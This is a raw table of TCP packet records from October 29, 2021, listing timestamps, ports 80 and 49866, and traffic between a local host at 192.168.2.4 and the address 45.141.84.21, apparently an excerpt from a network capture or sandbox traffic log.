Oct 29, 2021 20:50:51.456671000 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456695080 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456712008 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456720114 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.456759930 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.456816912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456840038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456877947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456895113 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456918955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456923008 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.456942081 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456948042 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.456968069 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456984043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456993103 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.457035065 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.457237005 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.457261086 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.457284927 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.457300901 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.457344055 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.457377911 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.496793985 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.496823072 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.496917963 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.496932983 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.496989012 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.497071981 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.504992962 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505024910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505045891 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505062103 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505084038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505105019 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505125046 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505141020 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505142927 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.505211115 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.505239964 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.505403042 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505429029 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505450010 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505466938 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505495071 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505518913 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505527973 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.505538940 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505556107 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505577087 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.505614042 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.505664110 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505687952 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505713940 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505745888 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.505821943 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.505880117 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.506299973 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506331921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506356955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506375074 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506397963 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506422043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506443024 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506464005 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506468058 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.506486893 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506510019 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506514072 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.506526947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506551981 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.506881952 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506901979 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506920099 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506937027 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506951094 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.506953955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506972075 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506983995 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.506994009 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.507042885 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.507087946 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507226944 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507251978 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507270098 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507287979 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.507294893 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507318974 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507320881 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.507343054 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507358074 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507376909 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.507406950 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.507528067 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507555008 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507622957 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.507647991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507674932 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507698059 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507723093 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507725954 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.507740974 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507767916 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.507786036 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507808924 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507832050 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507833004 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.507848978 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.507877111 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.508270025 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508300066 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508322001 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508339882 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508346081 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.508374929 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.508477926 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508505106 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508526087 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508539915 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.508543015 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508567095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508575916 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.508586884 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508703947 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.508905888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508920908 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.508981943 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.547930002 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.547960997 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.547982931 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.547998905 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.548090935 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.548141003 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.556408882 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.556437969 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.556452990 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.556468964 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.556485891 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.556504011 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.556518078 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.556575060 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.556622028 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.556627989 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.556992054 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557020903 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557043076 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557064056 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557084084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557106018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557115078 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.557125092 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557141066 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.557157993 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.557385921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557409048 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557430029 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557439089 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.557444096 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557467937 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.557528973 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557550907 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557570934 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557575941 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.557585955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557605982 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557615042 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.557627916 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557646990 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557651997 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.557662010 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.557682037 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.558104038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558131933 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558165073 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.558199883 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558223009 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558243036 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.558247089 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558278084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558289051 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.558293104 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558351040 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.558518887 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558545113 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558564901 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558588028 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558587074 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.558609962 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558631897 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558634996 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.558649063 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558670998 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558670998 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.558693886 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558713913 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558717012 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.558729887 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.558747053 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.559148073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559171915 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559194088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559211016 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559221029 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.559267998 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.559367895 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559398890 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559426069 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559426069 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.559442997 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559468031 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.559834003 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559863091 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559887886 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559891939 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.559910059 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559931040 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559932947 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.559952974 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559969902 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.559983969 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.559992075 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.560007095 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.560014009 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.560035944 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.560053110 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.560058117 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.560081005 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.560106039 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.560107946 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.560127020 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.560139894 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.560142040 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.560187101 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.599598885 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.599637032 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.599663973 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.599684000 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.599706888 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.599745989 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.607583046 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607625008 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607649088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607672930 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607697010 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607719898 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607718945 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.607738018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607762098 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607784033 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.607786894 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607808113 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.607815027 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607834101 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.607857943 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.608443022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608477116 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608504057 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608514071 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.608530045 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608541012 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.608556032 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608580112 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608591080 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.608597994 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608639002 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.608752966 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608779907 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608803988 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608820915 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608825922 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.608845949 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608874083 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.608896017 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608920097 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608935118 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.608951092 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.608972073 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.608989954 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609013081 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609035015 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609050989 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609061956 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.609092951 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.609108925 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609134912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609157085 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609173059 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609174013 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.609215975 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.609253883 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609282017 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609319925 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.609433889 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609457016 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609503031 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.609560966 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609764099 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609790087 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609806061 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609816074 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.609828949 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609853029 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609853983 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.609874010 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609889984 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.609891891 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.609930038 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.610152006 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610182047 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610204935 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610220909 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610225916 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.610244989 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610268116 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610266924 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.610305071 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.610449076 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610467911 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610582113 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610610962 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610635996 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610651970 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.610651016 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.610670090 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.610698938 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.611095905 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611126900 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611157894 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611181021 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611196995 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.611202955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611227036 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611242056 CEST	80	49866	45.141.84.21	192.168.2.4
